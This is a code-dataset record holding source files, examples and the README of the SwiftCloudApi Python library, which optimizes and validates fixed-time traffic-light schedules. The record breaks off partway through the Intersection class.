repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
stijnfleuren/SwiftCloudApi
|
https://github.com/stijnfleuren/SwiftCloudApi
|
44ccda2e01868ae2b305564e9f2cf13e99e76823
|
30f3b6c1fd80e5cfa5ce11e1daa08a09ab1e4e9b
|
bd3b7ff0a9605a5e8e5d217b3fc8e1084db36423
|
refs/heads/master
| 2023-07-03T05:41:02.276613 | 2021-08-03T17:13:49 | 2021-08-03T17:13:49 | 295,122,441 | 3 | 0 |
NOASSERTION
| 2020-09-13T09:54:26 | 2021-06-26T07:51:44 | 2021-07-28T06:30:51 |
Python
|
[
{
"alpha_fraction": 0.6542515754699707,
"alphanum_fraction": 0.6758022904396057,
"avg_line_length": 53.730770111083984,
"blob_id": "3922bf7b3d08ed43ca366d75b981388f14b58a4b",
"content_id": "282fe51cb6567ace55bbbc01c3445b8994b58e2c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4269,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 78,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_conflicts.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from typing import Tuple, List\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import GreenYellowInterval, FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\n\n\ndef validate_conflicts(intersection: Intersection, fts: FixedTimeSchedule, tolerance: float = 10**(-2)):\n \"\"\"\n Ensure all conflicts are satisfied.\n :param intersection: intersection object (this object contains all conflicts and associated minimum clearance times\n that should be satisfied)\n :param fts: fixed-time schedule to check\n :param tolerance: tolerance in seconds for violating safety restrictions\n :raises SafetyViolation if validations fail\n \"\"\"\n\n for conflict in intersection.conflicts:\n intervals1 = fts.get_greenyellow_intervals(signalgroup=conflict.id1)\n intervals2 = fts.get_greenyellow_intervals(signalgroup=conflict.id2)\n for index1, interval1 in enumerate(intervals1):\n for index2, interval2 in enumerate(intervals2):\n if not conflict_satisfied(interval1=interval1, interval2=interval2, period=fts.period,\n conflict=conflict, tolerance=tolerance):\n raise SafetyViolation(\n f\"Conflict not satified for interval {index1:d} of '{conflict.id1:s}' \"\n f\"and interval {index2:d} of '{conflict.id2:s}'.\")\n\n\ndef conflict_satisfied(interval1: GreenYellowInterval, interval2: GreenYellowInterval, period: float,\n conflict: Conflict, tolerance: float):\n forbidden_interval_for_sg2 = ((interval1.start_greenyellow - conflict.setup21 + tolerance) % period,\n (interval1.end_greenyellow + conflict.setup12 - tolerance) % period)\n intersection = overlap_of_intervals(interval1=forbidden_interval_for_sg2,\n interval2=(interval2.start_greenyellow, interval2.end_greenyellow),\n period=period)\n if intersection:\n return False\n else:\n return True\n\n\ndef overlap_of_intervals(interval1: Tuple[float, float], interval2: Tuple[float, float], period: float\n ) -> List[Tuple[float, float]]:\n \"\"\" compute the overlap of two periodic intervals.\n Intervals have format (starting_time, ending_time), where starting_time and ending_time are between zero and\n the period duration. Output is a list of intervals (as the intersection could potentially be two\n disjunct intervals\"\"\"\n\n # both are green at time T\n if interval1[0] > interval1[1] and interval2[0] > interval2[1]:\n return [(max(interval1[0], interval2[0]), min(interval1[1], interval2[1]))]\n\n # only one of the two intervals could potentially still include time=period\n # if interval1 includes time=period, then swap the intervals so that interval 2 includes this period\n if interval1[0] > interval1[1]:\n interval1, interval2 = interval2, interval1\n\n # convert the second interval to two intervals if it includes time=period; let [s,e] be interval2, then we use the\n # two intervals [s-period, e], [s,e+period], which because of periodicity are equivalent\n if interval2[0] < interval2[1]: # if this interval does not include time=period\n interval_list2_non_periodic = [interval2]\n else:\n interval_list2_non_periodic = [(interval2[0] - period, interval2[1]),\n (interval2[0], interval2[1] + period)]\n\n # compute the intersection of interval1 with the interval(s) in interval_list2_non_periodic\n overlapping_intervals = []\n for interval2_non_periodic in interval_list2_non_periodic:\n max_start = max(interval1[0], interval2_non_periodic[0])\n min_end = min(interval1[1], interval2_non_periodic[1])\n # if the two intervals overlap\n if max_start < min_end:\n # we store the interval (but first convert ot back to the range [0, period))\n overlapping_intervals.append(\n (max_start % period, min_end % period))\n return overlapping_intervals\n"
},
{
"alpha_fraction": 0.7341283559799194,
"alphanum_fraction": 0.7369344234466553,
"avg_line_length": 49.91071319580078,
"blob_id": "8f6515e189f0e57a1f243bd4a9efd332c9d62d2f",
"content_id": "65ab426277718be67a9277335d85c6f17e5fd1e2",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2851,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 56,
"path": "/swift_cloud_py/examples/evaluate_fixed_time_schedule.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef evaluate_fixed_time_schedule(print_fixed_time_schedule: bool = False):\n \"\"\"\n In this example we show how to evaluate a fixed-time schedule.\n\n Use case: comparing two fixed-time schedules (perhaps not optimized via this api) on expected performance.\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). You can download this\n file (example_smd_export.json) from\n https://github.com/stijnfleuren/SwiftCloudApi/tree/master/swift_cloud_py/examples\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n logging.info(f\"Minimizing delay\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, horizon=2)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n # this should return the same estimated delay. With this functionality we could evaluate the expected performance\n # of any fixed-time schedule.\n logging.info(f\"Evaluate this schedule\")\n kpis = SwiftMobilityCloudApi.evaluate_fts(intersection=intersection, fixed_time_schedule=fixed_time_schedule,\n arrival_rates=arrival_rates, horizon=2)\n logging.info(f\"Output: {kpis}\")\n"
},
{
"alpha_fraction": 0.7690077424049377,
"alphanum_fraction": 0.7760217189788818,
"avg_line_length": 53.56122589111328,
"blob_id": "692d0c9e7f7e36ff8b1ffcf726c48353c11036a5",
"content_id": "de0b4fb91df066be8d2c9a39aa378b5d37eb72a9",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10693,
"license_type": "permissive",
"max_line_length": 566,
"num_lines": 196,
"path": "/README.md",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "<img src=\"https://www.swiftmobility.eu/swiftmobility.png\" width=\"500\"/>\n\n# Swift Mobility Cloud API\n\n## Introduction\nThis library provides a pure Python interface for the [Swift Mobility Cloud API](https://www.swiftmobility.eu/services). It works with Python versions 3.7 and above.\n\n[Swift Mobility](https://www.swiftmobility.eu/) provides services for fully automated optimization of fixed-time schedules (traffic light schedules) in a matter of seconds, even for the most complex intersections. [Swift Mobility](https://www.swiftmobility.eu/) exposes a rest APIs and this library is intended to make it even easier for Python programmers to use.\n\n## Usecases\n\n### Smart traffic-light control\n\n#### Completely adaptive traffic light control\nThe API can, in real-time, compute the optimal fixed-time schedule to best handle the current traffic situation; this enables truly smart and dynamic traffic light control that automatically adapts to the actual traffic situation. For example, by periodically computing the optimal fixed-time schedule and automatically converting it to a vehicle-actuated controller (e.g., using the green times as maximum green times and allowing green times to be terminated prematurely).\n\n#### Automatically switch between control strategies\nLow traffic and heavy traffic situations require a different control strategy. The API allows you to periodically quantify the current traffic situation in an automated manner, e.g., every 30 minutes. The result could be used to (automatically!) select the control strategy that best matches the current traffic situation; this would be truly smart traffic-light control!\n\n### Monitoring\nWith the API you can quantify (in real-time) the amount of traffic arriving at the intersection to distinguish between low traffic, moderate traffic and heavy traffic situations. This information can be used to improve traffic management (e.g., redirect traffic to relieve highly congested parts of the network).\n\n### Strategic decision making\n\n#### Maintenance\nSuppose traffic flow is not as smooth as desired at an intersection (e.g., experienced delays are large). With the API you can quantify if the intersection actually has sufficient capacity. If it does, then it might be sensible to reevaluate (and potentially update) such traffic-light controllers. In this way, maintenance efforts can be focused on the intersections where large improvements can be expected. If the capacity of the intersection is expected to be insufficient as well, then this might motivate infrastructural changes (see next usecase).\n\n#### Updating infrastructure\nTraffic situations may change overtime, e.g., due to urban development. Therefore, it is very important to periodically evaluate if any infrastructural changes (or policy changes by the government) are needed.\n\nThis is a very difficult decision to be made and it has high impact; quantitative support is really useful when making these decisions. With the API you can determine the maximum traffic increase that the infrastructure is able to handle under optimal traffic light control. This could be used to answer questions like: Is the capacity of the infrastructure (intersection) expected to still be sufficient in the upcoming 3 years?\n\n## Installing\nYou can install the [Swift Mobility Cloud API](https://www.swiftmobility.eu/services) using:\n\n```sh\n$ pip install swift_cloud_py\n```\n## Getting the code\n\nThe code is hosted at https://github.com/stijnfleuren/SwiftCloudApi\n\nCheck out the latest development version anonymously with:\n\n $ git clone git://github.com/stijnfleuren/SwiftCloudApi.git\n $ cd swift_cloud_py\n\nTo install dependencies using pip, run:\n\n $ python -m pip install -Ur requirements.txt\n \nTo install dependencies using pipenv, run (from the swift_cloud_py/ folder):\n\n $ python -m pipenv install\n\n## Getting started\n\n### Credentials\nTo be able to connect to the Swift Mobility Cloud API you need credentials.\nTo this end, set the following two environment variables:\n - smc_api_key: this is the Swift Mobility Cloud API KEY\n - smc_api_secret: this is the Swift Mobility Cloud API Secret Key.\n\nIf you do not yet have these credentials, you can send a mail to [email protected].\n\n### How to load an intersection\nIntersections and arrival rates can be loaded from a json file exported from Swift Mobility Desktop:\n\n```python\nimport json\nwith open(smd_json_export, \"r\") as f:\n json_dict = json.load(f)\n\nintersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\narrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n```\n\n### How to create an intersection\nIntersections can also be defined programmatically. \n#### Traffic light\nCreating traffic lights:\n```python\ntraffic_light = TrafficLight(capacity=1800, lost_time=2.2)\n```\n#### Signalgroups\nCreating signalgroup:\n```python\nsignalgroup = SignalGroup(id=\"2\", traffic_lights=[traffic_light1, traffic_light2], \n min_greenyellow=5, max_greenyellow=100, \n min_red=10, max_red=100, min_nr=1, max_nr=2)\n```\n#### Relations between signal groups\nWe can create traffic light control restrictions between signal groups. \n\nA conflict prevents two conflicting traffic streams from simultaneously crossing the intersection.\n```python\nconflict12 = Conflict(id1=signalgroup1.id, id2=signalgroup2.id, setup12=2, setup21=3)\n```\nA synchronous start ensures that two greenyellow intervals start at the same time; this can be used to create awareness\nof partial conflicts, e.g., two opposing left movements (when driving on the right-hand side of the road).\n```python\nsync_start = SyncStart(from_id=signalgroup1.id, to_id=signalgroup2.id)\n```\nA greenyellow-lead can be used to create awareness of a partial conflict, e.g., to let turning traffic know that cyclists or pedestrians may cross the intersection.\n```python\ngreenyellow_lead = GreenyellowLead(from_id=signalgroup1.id, to_id=signalgroup2.id, min_seconds=2, max_seconds=10)\n```\nAn offset can be used to coordinate the start of two greenyellow intervals, which is useful to create green waves.\n```python\noffset = Offset(from_id=signalgroup1.id, to_id=signalgroup2.id, offset=5)\n```\n#### Intersections\nCreating an intersection with all relevant traffic light control restrictions:\n```python\nintersection = Intersection(signalgroups=[signalgroup1, signalgroup2, signalgroup3],\n conflicts=[conflict12, conflict13, conflict23])\n```\nNote: to optimize a fixed-time controller for two intersections with one controller, then this has to be 'modelled' as one intersection; the signalgroups (and conflicts etc.) of both intersections have to be provided to this Intersection object.\n\n#### Arrival scenarios\nCreate an arrival scenario (arrival rates):\n```python\nmorning_rates = ArrivalRates(id_to_arrival_rates={\"2\": [800, 700], \"5\": [300], \"8\": [350]})\n```\n\n### Storing and restoring intersections etc.\nYou can convert intersections and other objects to json; this is convenient to locally store this information for later \nre-use.\n```python\njson_serializable = intersection.to_json()\n```\nYou can later restore this same object:\n```python\nintersection = Intersection.from_json(json_serializable)\n```\n\n### Optimizing fixed-time schedules\nOptimize a fixed-time schedule for an intersection and a certain arrival rates:\n```python\nfixed_time_schedule, phase_diagram, objective_value, warm_start_info = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=morning_rates, initial_queue_lengths=estimated_queue_lengths,\n objective=ObjectiveEnum.max_capacity)\n```\nWe allow for several objectives:\n* **ObjectiveEnum.min_delay**: Search for the fixed-time schedule that minimizes the expected (average) delay experienced by road users.\n* **ObjectiveEnum.max_capacity**: Search for the fixed-time schedule that maximizes the largest increase in traffic (scaling factor) that the intersection can handle without becoming unstable/oversaturated. This gives an indication of how close to oversaturation the intersection is; an objective value of < 1 indicates that the intersection is oversaturated for all possible fixed-time schedules. This has usecases ranging from monitoring, smart traffic-light control and strategic decision making (see also swift_cloud_py/examples/maximizing_intersection_capacity)\n* **ObjectiveEnum.min_period**: Search for the fixed-time schedule that has the smallest period duration (while still being stable).\n\nYou can print the fixed-time schedule in pretty format:\n```python\nprint(fixed_time_schedule)\n```\n\n### Retrieving multiple fixed-time schedules\nThe api allows for optimizing the best *k* schedules. After you retrieved the best schedule via the api, you can obtain \nthe second best schedule as follows:\n```python\nfixed_time_schedule, phase_diagram, objective_value, warm_start_info = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=morning_rates, initial_queue_lengths=estimated_queue_lengths,\n objective=ObjectiveEnum.max_capacity, fixed_time_schedules_to_exclude=[best_fixed_time_schedule],\n warm_start_info=warm_start_info)\n```\n### computing phase diagram\nWhen optimizing a fixed-time schedule, also the associated phase diagram is returned. However, you can also compute the phase diagram of any other fixed-time schedule:\n```python\nphase_diagram = SwiftMobilityCloudApi.get_phase_diagram(\n intersection=intersection, fixed_time_schedule=fixed_time_schedule)\n```\nThe phase diagram can be printed in pretty format:\n```python\nprint(phase_diagram)\n```\n\n### Tuning a fixed-time schedule\nTraffic situations change throughout the day. This following function allows you to quickly adapt the green times of an existing fixed-time schedule to a new traffic situations.\n```python\ntuned_fixed_time_schedule, objective_value = SwiftMobilityCloudApi.get_tuned_fts(\n intersection=intersection, fixed_time_schedule=fixed_time_schedule, arrival_rates=midday_rates, \n initial_queue_lengths=estimated_queue_lengths, objective=ObjectiveEnum.min_delay)\n```\n### Evaluating a fixed-time schedule\nThe expected performance of a fixed-time schedule can be computed as follows:\n```python\nkpis = SwiftMobilityCloudApi.evaluate_fts(intersection=intersection, fixed_time_schedule=fixed_time_schedule,\n arrival_rates=evening_rates)\n```\nThese performance metrics can be printed with:\n```python\nprint(kpis)\n```\n\n### Examples\nOn [github](https://github.com/stijnfleuren/SwiftCloudApi) you can find several examples in the folder swift_cloud_py/examples to get you started.\n\n## License\nMIT licence"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 20.714284896850586,
"blob_id": "533fa64368408fffeb2e0bea5e282eeacbe14a4e",
"content_id": "61c946d60239dca7bf663d6aa472792a1084c2c3",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 7,
"path": "/swift_cloud_py/enums.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from enum import Enum\n\n\nclass ObjectiveEnum(Enum):\n min_delay = \"min delay\"\n min_period = \"min period duration\"\n max_capacity = \"max capacity\"\n"
},
{
"alpha_fraction": 0.6866931319236755,
"alphanum_fraction": 0.7202085256576538,
"avg_line_length": 53.43243408203125,
"blob_id": "5368d0bd82ddfa868018a25c1b1d05b747dce680",
"content_id": "0031f1153a8ca9dc1cc1f2b45aec540234ab30a3",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4028,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 74,
"path": "/swift_cloud_py/examples/create_intersection.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef create_intersection_and_optimize():\n \"\"\"\n Example showing how to:\n - create traffic lights, signal groups and intersections, ...\n - optimize a fixed-time schedule for this intersection\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # signal group consisting of two traffic light allowing 1 or 2 greenyellow intervals per repeating period.\n traffic_light1 = TrafficLight(capacity=1800, lost_time=2.2)\n traffic_light2 = TrafficLight(capacity=1810, lost_time=2.1)\n signalgroup1 = SignalGroup(id=\"2\", traffic_lights=[traffic_light1, traffic_light2], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100, min_nr=1, max_nr=2)\n\n # signal group consisting of one traffic light allowing 1 greenyellow interval (default) per repeating period.\n traffic_light3 = TrafficLight(capacity=1650, lost_time=3.0)\n signalgroup2 = SignalGroup(id=\"5\", traffic_lights=[traffic_light3], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100)\n\n # signal group consisting of one traffic light allowing 1 greenyellow interval (default) per repeating period.\n traffic_light4 = TrafficLight(capacity=1800, lost_time=2.1)\n signalgroup3 = SignalGroup(id=\"8\", traffic_lights=[traffic_light4], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100)\n\n # conflicts & clearance times\n conflict12 = Conflict(id1=signalgroup1.id, id2=signalgroup2.id, setup12=1, setup21=2)\n conflict13 = Conflict(id1=signalgroup1.id, id2=signalgroup3.id, setup12=1, setup21=2)\n conflict23 = Conflict(id1=signalgroup2.id, id2=signalgroup3.id, setup12=2, setup21=3)\n\n # initialize intersection object\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2, signalgroup3],\n conflicts=[conflict12, conflict13, conflict23])\n\n # set associated arrival rates\n arrival_rates = ArrivalRates(id_to_arrival_rates={\"2\": [800, 700], \"5\": [150], \"8\": [180]})\n\n logging.info(f\"Minimizing average experienced delay\")\n # optimize fixed-time schedule\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, objective=ObjectiveEnum.min_delay)\n\n logging.info(f\"Average experienced delay {objective_value: .3f} seconds\")\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n # the following code indicates how to compute a phase diagram from a fixed-time schedule (note that now it makes\n # no sense to do so as it was already computed above)\n logging.info(\"Computing phase diagram from fixed-time schedule. Should be the same as before\")\n phase_diagram = SwiftMobilityCloudApi.get_phase_diagram(intersection=intersection,\n fixed_time_schedule=fixed_time_schedule)\n logging.info(phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n create_intersection_and_optimize()\n"
},
{
"alpha_fraction": 0.6308476328849792,
"alphanum_fraction": 0.6324687600135803,
"avg_line_length": 52.28395080566406,
"blob_id": "06390220ded51a45c2c7f3eec7e393497fc50717",
"content_id": "67e7b403e9755a3e1e38a953320cbbc1f0856c02",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4318,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 81,
"path": "/swift_cloud_py/entities/intersection/signalgroup.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using SignalGroup-typing inside SignalGroup-class\n\nfrom typing import List, Dict\n\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass SignalGroup:\n # noinspection PyShadowingBuiltins\n def __init__(self, id: str, traffic_lights: List[TrafficLight], min_greenyellow: float, max_greenyellow: float,\n min_red: float, max_red: float, min_nr: int = 1, max_nr: int = 1) -> None:\n \"\"\"\n Representation of signal group, which is a group of traffic lights with the same state (green, yellow, red))\n :param id: name of the signal group\n :param traffic_lights: list of traffic lights that are part of this signal group\n :param min_greenyellow: minimum duration (in seconds) of each greenyellow interval\n :param max_greenyellow: maximum duration (in seconds) of each greenyellow interval\n :param min_red: minimum duration (in seconds) of each red interval\n :param max_red: maximum duration (in seconds) of each red interval\n :param min_nr: minimum number of greenyellow intervals (during a repeating period)\n :param max_nr: maximum number of greenyellow intervals (during a repeating period);\n the lower this value the faster the optimization!\n \"\"\"\n # by converting to the correct type we already check for incompatible types\n self.id = str(id)\n self.min_greenyellow = float(min_greenyellow)\n self.max_greenyellow = float(max_greenyellow)\n self.min_red = float(min_red)\n self.max_red = float(max_red)\n self.traffic_lights = traffic_lights\n self.min_nr = int(min_nr)\n self.max_nr = int(max_nr)\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n # dict creates copy preventing modifying original object\n json_dict = dict(self.__dict__)\n # overwrite traffic lights with json version\n json_dict[\"traffic_lights\"] = [traffic_light.to_json() for traffic_light in self.traffic_lights]\n return json_dict\n\n @staticmethod\n def from_json(signalgroup_dict: Dict) -> SignalGroup:\n \"\"\"Loading signal group from json (expected same json structure as generated with to_json)\"\"\"\n return SignalGroup(id=signalgroup_dict[\"id\"],\n min_greenyellow=signalgroup_dict[\"min_greenyellow\"],\n max_greenyellow=signalgroup_dict[\"max_greenyellow\"],\n min_red=signalgroup_dict[\"min_red\"],\n max_red=signalgroup_dict[\"max_red\"],\n min_nr=signalgroup_dict[\"min_nr\"],\n max_nr=signalgroup_dict[\"max_nr\"],\n traffic_lights=[TrafficLight.from_json(traffic_light_dict)\n for traffic_light_dict in signalgroup_dict[\"traffic_lights\"]]\n )\n\n def _validate(self) -> None:\n \"\"\"\n validate the arguments provided to this object\n :return: - (raises ValueError if validation does not pass)\n \"\"\"\n if not isinstance(self.traffic_lights, list):\n raise ValueError(\"traffic_lights should be a list of TrafficLight objects\")\n for traffic_light in self.traffic_lights:\n if not isinstance(traffic_light, TrafficLight):\n raise ValueError(\"traffic_lights should be a list of TrafficLight objects\")\n\n if not self.min_greenyellow >= 0:\n raise ValueError(\"min_greenyellow must be a non-negative number\")\n if not 0 < self.max_greenyellow >= self.min_greenyellow:\n raise ValueError(\"max_greenyellow must be a positive number exceeding (or equal to) min_greenyellow\")\n\n if not self.min_red >= 0:\n raise ValueError(\"min_red must be a non-negative number\")\n if not 0 < self.max_red >= self.min_red:\n raise ValueError(\"max_red must be a positive number exceeding (or equal to) min_red\")\n\n if not self.min_nr >= 1:\n raise ValueError(\"min_nr must be a positive integer\")\n if not int(self.max_nr) >= int(self.min_nr):\n raise ValueError(\"max_nr must exceed or equal min_nr\")\n\n\n"
},
{
"alpha_fraction": 0.6378639936447144,
"alphanum_fraction": 0.6405919790267944,
"avg_line_length": 53.9176025390625,
"blob_id": "b0af9e0bf0edf7d25bad6fc649dfab3b17987765",
"content_id": "9a6e360d068589d28127f2f03688004112f50570",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14663,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 267,
"path": "/swift_cloud_py/entities/intersection/intersection.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using intersection-typing inside intersection-class\nimport json\nfrom typing import List, Union, Optional, Dict\n\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict, SyncStart, Offset, GreenyellowLead, \\\n GreenyellowTrail\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\n\n\nclass Intersection:\n def __init__(self, signalgroups: List[SignalGroup], conflicts: List[Conflict],\n sync_starts: Optional[List[SyncStart]] = None, offsets: Optional[List[Offset]] = None,\n greenyellow_leads: Optional[List[GreenyellowLead]] = None,\n greenyellow_trails: Optional[List[GreenyellowTrail]] = None,\n periodic_orders: Optional[List[PeriodicOrder]] = None) -> None:\n \"\"\"\n intersection object containing information depending on intersection geometry and traffic light control\n strategy (e.g., sync starts etc.);\n\n Note: to optimize a fixed-time controller for two intersections with one controller, then this has to be\n 'modelled' as one intersection; the signal groups (and conflicts etc.) of both intersections have to be\n provided to this Intersection object.\n :param signalgroups: list of signal group objects present at the intersection.\n :param conflicts: list of conflicts at the intersection.\n :param sync_starts: list of synchronous starts desired for this intersection.\n :param offsets: list of offsets desired for this intersection.\n :param greenyellow_leads: list of greenyellow_leads desired for this intersection.\n :param greenyellow_trails: list of greenyellow_trails desired for this intersection.\n :param periodic_orders: list of periodic orders in which the signalgroups must receive their\n greenyellow interval; if some signal groups may have multiple greenyellow intervals, then one of these\n intervals should adhere to this fixed periodic order.\n \"\"\"\n self.signalgroups = signalgroups\n self.conflicts = conflicts\n self.sync_starts = sync_starts if sync_starts else []\n self.offsets = offsets if offsets else []\n self.greenyellow_leads = greenyellow_leads if greenyellow_leads else []\n self.greenyellow_trails = greenyellow_trails if greenyellow_trails else []\n self.periodic_orders = periodic_orders if periodic_orders else []\n self._validate()\n self._id_to_signalgroup = {signalgroup.id: signalgroup for signalgroup in signalgroups}\n\n @property\n def other_relations(self) -> List[Union[SyncStart, Offset, GreenyellowLead, GreenyellowTrail]]:\n other_relations = []\n other_relations.extend(self.sync_starts)\n other_relations.extend(self.offsets)\n other_relations.extend(self.greenyellow_leads)\n other_relations.extend(self.greenyellow_trails)\n return other_relations\n\n def to_json(self):\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n json_dict = dict(signalgroups=[signalgroup.to_json() for signalgroup in self.signalgroups],\n conflicts=[conflict.to_json() for conflict in self.conflicts],\n other_relations=[other_relation.to_json() for other_relation in self.other_relations],\n periodic_orders=[periodic_order.to_json() for periodic_order in self.periodic_orders])\n return json_dict\n\n def get_signalgroup(self, signalgroup_id: str):\n if signalgroup_id not in self._id_to_signalgroup:\n raise ValueError(f\"signalgroup with id={signalgroup_id} does not exist\")\n else:\n return self._id_to_signalgroup[signalgroup_id]\n\n @staticmethod\n def from_json(intersection_dict: Dict) -> Intersection:\n \"\"\"\n Loading intersection from json (expected same json structure as generated with to_json)\n :param intersection_dict:\n :return: intersection object\n \"\"\"\n # load signal groups\n signalgroups = [SignalGroup.from_json(signalgroup_dict=signalgroup_dict)\n for signalgroup_dict in intersection_dict[\"signalgroups\"]]\n\n if \"periodic_orders\" in intersection_dict:\n periodic_orders = [PeriodicOrder.from_json(order_dict=order_dict)\n for order_dict in intersection_dict[\"periodic_orders\"]]\n else:\n periodic_orders = []\n\n # load conflicts\n conflicts = [Conflict.from_json(conflict_dict=conflict_dict)\n for conflict_dict in intersection_dict[\"conflicts\"]]\n\n # load other relations (synchronous starts, offsets and greenyellow_lead)\n sync_starts = []\n offsets = []\n greenyellow_leads = []\n greenyellow_trails = []\n for other_relation_dict in intersection_dict[\"other_relations\"]:\n assert other_relation_dict[\"from_start_gy\"] == other_relation_dict[\"to_start_gy\"], \\\n \"besides conflicts, at the moment the cloud api can only handle synchronous starts, offsets, \" \\\n \"greenyellow-leads and greenyellow-trails.\"\n if other_relation_dict[\"from_start_gy\"] is True and 